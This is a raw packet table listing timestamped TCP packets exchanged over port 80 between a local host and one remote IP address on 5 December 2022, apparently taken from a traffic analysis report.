Dec 5, 2022 01:32:37.818619013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.818624973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818648100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818666935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.818670988 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818713903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818737030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818754911 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.818778992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.818828106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818852901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818897963 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.818926096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.818985939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819009066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819057941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819147110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819170952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819195986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819219112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819221973 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819241047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819242001 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819266081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819286108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819288969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819313049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819335938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819350958 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819359064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819372892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819382906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819411039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819433928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819448948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819457054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819477081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819482088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819504976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819529057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819544077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819551945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819565058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819576025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819597960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819611073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819621086 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819644928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819667101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819680929 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819689035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819700956 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819713116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819736004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819757938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819771051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819781065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819803953 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.819808006 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.819849014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820058107 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820085049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820107937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820132017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820139885 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820154905 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820177078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820178986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820202112 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820225954 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820247889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820250988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820271969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820274115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820296049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820317984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820319891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820343018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820364952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820370913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820386887 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820406914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820411921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820435047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820457935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820473909 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820481062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820502996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820504904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820525885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820564032 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820632935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820656061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820678949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820694923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820703983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820717096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820728064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820750952 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820774078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820785999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820796013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820811033 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820818901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820842981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820864916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820879936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820888042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820903063 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820911884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820935011 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820957899 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.820972919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.820981026 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821000099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821007013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821028948 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821050882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821072102 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821073055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821094990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821098089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821120977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821142912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821157932 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821166039 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821178913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821190119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821213961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821235895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821249962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821258068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821270943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821280956 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821302891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821324110 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821338892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821346998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821361065 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821369886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821392059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821413994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821429014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821436882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821465969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821530104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821552992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821568966 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821577072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821599960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821623087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821638107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821645975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821660995 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821670055 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821692944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821716070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821737051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821738958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821757078 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821762085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821784973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821806908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821826935 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821830034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821851015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821854115 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821877003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821898937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821921110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821923018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821943998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.821945906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821969986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.821990967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822011948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822015047 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822032928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822038889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822061062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822086096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822102070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822108030 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822129011 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822129965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822154045 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822176933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822194099 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822200060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822216988 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822221994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822251081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822273016 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822290897 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822294950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822305918 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822318077 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822340012 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822379112 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822674036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822699070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822724104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822746038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822746992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822770119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822781086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822792053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822814941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822814941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822838068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822860003 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822882891 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822896004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822904110 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.822918892 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822942972 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822964907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.822989941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823012114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823034048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823055983 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823084116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823107958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823131084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823143005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823143005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823143005 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823156118 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823169947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823169947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823179007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823200941 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823201895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823225021 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823249102 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823267937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823271990 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823295116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823297977 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823318005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823339939 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823358059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823363066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823384047 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823385000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823406935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823429108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823446989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823451996 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823472023 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823474884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823499918 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823522091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823523998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823544979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823559046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823568106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823590994 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823613882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823637009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823642969 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823658943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823673010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823682070 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823698997 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823705912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823729038 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823751926 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823770046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823774099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823792934 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823797941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823821068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823844910 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823860884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823868036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823884010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823892117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823915005 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823937893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823954105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823961973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.823976994 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.823985100 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824007034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824028969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824043036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824052095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824070930 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824074984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824100018 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824130058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824152946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824157953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824173927 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824177980 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824202061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824222088 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824224949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824249029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824271917 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824292898 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824295998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824316978 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824318886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824342966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824364901 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824388027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824388981 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824409962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824412107 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824434042 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824456930 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824479103 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824481010 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824501991 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824506998 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824526072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824542999 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824548960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824573040 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824594975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824618101 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824618101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824640989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824641943 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824662924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824676037 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824685097 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824707031 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824729919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824745893 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824754000 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824779034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824781895 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824800968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824822903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824841976 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.824847937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.824871063 CET	80	49705	66.235.200.147	192.168.2.3
